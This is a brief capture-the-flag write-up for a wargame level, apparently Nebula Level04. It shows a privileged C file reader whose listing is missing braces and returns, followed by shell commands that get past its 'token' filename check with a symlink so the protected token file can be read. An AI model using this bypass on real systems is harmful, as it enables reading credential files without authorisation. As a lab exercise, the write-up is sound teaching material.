In Level04 we are given the code of a program owned by flag04 user:

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>

int main(int argc, char **argv, char **envp)
  char buf[1024];
  int fd, rc;

  if(argc == 1) {
    printf("%s [file to read]\n", argv[0]);

  if(strstr(argv[1], "token") != NULL) {
    printf("You may not access '%s'\n", argv[1]);

  fd = open(argv[1], O_RDONLY);
  if(fd == -1) {
    err(EXIT_FAILURE, "Unable to open %s", argv[1]);

  rc = read(fd, buf, sizeof(buf));

  if(rc == -1) {
    err(EXIT_FAILURE, "Unable to read fd %d", fd);

  write(1, buf, rc);

The program opens a file passed as first argument if the name does not contain the token string so we cannot use it to open our target token file … or can we? Turns out that solving the level was as easy as creating symlink with a different name:

[email protected]:~$ /home/flag04/flag04 /home/flag04/token
You may not access '/home/flag04/token'
[email protected]:~$ ln -s /home/flag04/token nekot
[email protected]:~$ /home/flag04/flag04 nekot